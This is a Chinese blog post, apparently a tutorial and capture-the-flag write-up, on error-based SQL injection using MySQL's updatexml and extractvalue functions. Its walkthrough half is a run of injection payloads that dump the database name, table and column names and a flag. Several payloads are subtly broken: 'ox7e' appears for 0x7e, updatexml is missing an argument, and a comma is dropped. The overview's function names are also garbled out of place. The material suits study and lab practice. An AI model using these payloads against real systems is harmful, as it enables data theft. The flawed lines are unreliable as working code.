目录

报错注入概述

报错注入的原理

报错注入的步骤

报错注入的常用函数

实战案例

结论

方法1:updatexml函数

查看数据库名

查看表名

查看表中数据

方法2:extractvalue函数

查看数据库名

查看数据库中的表名

查看表中字段名

查看表中数据


报错注入概述

报错注入是一种SQL注入技术的变种,攻击者通过故意制造数据库错误来获取敏感信息。这种方法通常用于那些不允许正常错误信息回显的应用程序,攻击者利用数据库的错误处理机制,将希望得到的信息嵌入到可能导致错误的SQL语句中,从而使错误信息透露出所需的数据。

报错注入的原理

报错注入的关键在于利用某些函数在特定条件下产生的错误信息。例如,、、等函数在接收到不符合要求的参数时会返回错误信息,而这些错误信息中可能包含了攻击者需要的数据。updatexml()extractvalue()floor()

报错注入的步骤
  1. 判断是否存在报错注入:通过在输入参数中添加单/双引号,观察是否会引发错误信息来判断是否存在报错注入的可能。
  2. 确定报错注入的条件:进一步构造含有特定函数的SQL语句,观察报错信息是否包含有用信息。
  3. 提取数据库信息:通过精心设计的SQL语句,利用报错注入获取数据库的版本、库名、表名等信息。

报错注入的常用函数

  • updatexml():用于修改XML文档中的节点值,当第二个参数不是有效XML时会产生错误。
  • extractvalue():用于从XML文档中提取特定XPath表达式的值,当XPath表达式无效时会报错。
  • floor():向下取整的数学函数,与结合使用时,可以在特定条件下产生错误rand()。

实战案例

在实际应用中,报错注入可用于获取数据库的版本、库名、表名等信息。例如,在SQLi Labs靶场中,攻击者可通过构造特定的报错注入语句来获取上述信息。

结论

报错注入是一种高级的SQL注入技术,它依赖于数据库的错误处理机制。了解和掌握报错注入的原理和技巧对于防御此类攻击至关重要。开发人员应确保应用程序的错误信息不被泄露,并对用户输入进行严格的验证和过滤,以防止报错注入的发生。

本关不是很麻烦,就使用SQL语句了,盲注的题就使用sqlmap工具了

方法1:updatexml函数

查看数据库名

1 union select updatexml(1,concat(ox7e,database(),ox7e),1);

查看表名

1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='sqli'),0x7e)) --

查看表中数据

1 and updatexml(1,concat(0x7e,(select flag from flag),0x7e))--

发现flag不完整,使用mid函数跳过第一个字符c,提取剩下的全部字符

1 and updatexml(1,concat(0x7e,mid((select flag from flag),2),0x7e))--

方法2:extractvalue函数

查看数据库名

1 and extractvalue(null,concat(0x7e,(database()),0x7e))

查看数据库中的表名

1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='sqli'),0x7e))--

查看表中字段名

1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag'),0x7e))--

查看表中数据

1 and extractvalue(1,concat(0x7e,mid((select flag from flag),2)0x7e))--

点赞(0) 打赏

评论列表 共有 0 条评论

暂无评论

微信公众账号

微信扫一扫加关注

发表
评论
返回
顶部